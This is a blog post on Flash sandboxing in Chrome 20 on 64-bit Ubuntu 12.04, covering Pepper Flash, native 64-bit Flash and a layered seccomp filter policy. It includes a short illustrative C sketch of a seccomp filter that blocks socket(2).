The biggest item is an improvement to Flash security. Traditionally, Linux -- across all browsers -- hasn't had great Flash security, due to lack of sandboxing options. That just changed: so-called Pepper Flash shipped to the stable channel on Linux with Chrome 20 (other platforms to follow real soon). I went into a little detail about the technical sandbox measures in Pepper Flash for Linux in an older blog post.

As mentioned in the previous blog post, native 64-bit Flash also gives a useful security boost on 64-bit Linux platforms.

There's more. Perhaps you're running 64-bit Ubuntu 12.04? Courtesy of Kees Cook, this release sneaked in Will Drewry's seccomp filter patches, which I blogged about earlier this year in the context of vsftpd-3.0.0's usage of seccomp filter sandboxing.

So why have just one Flash sandbox if you can have two? A bit of double-bagging if you like. Assuming you're running 64-bit Ubuntu 12.04 and Chrome 20 or newer, you'll also have a seccomp filter policy slapped on Flash -- in addition to the chroot() and PID namespace. This may impede attackers trying to perform a local privilege escalation, who can no longer call crazy brand-new syscalls or use socket() to load crazy protocol modules, etc.
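
For a flavor of what a seccomp filter can express, here's a minimal sketch, assuming x86-64 syscall numbering (a trivial one-syscall blacklist for illustration; the real Flash policy is a much more careful whitelist):

    #include <linux/filter.h>
    #include <linux/seccomp.h>
    #include <stddef.h>
    #include <sys/prctl.h>
    #include <sys/syscall.h>

    // Install a BPF program that kills the process on socket(2) and
    // allows everything else.
    int install_filter(void) {
        struct sock_filter filter[] = {
            // Load the syscall number.
            BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                     offsetof(struct seccomp_data, nr)),
            // If it's socket(2), fall through to the kill; else skip it.
            BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_socket, 0, 1),
            BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
            BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        };
        struct sock_fprog prog = {
            (unsigned short)(sizeof(filter) / sizeof(filter[0])), filter,
        };
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
            return -1;
        return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
    }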

No sandbox or combination of sandboxes will ever be perfect, but "some" is better than "none". For people who want to run Flash, Chrome 20 on 64-bit Ubuntu 12.04 is one of the more locked-down ways to do it.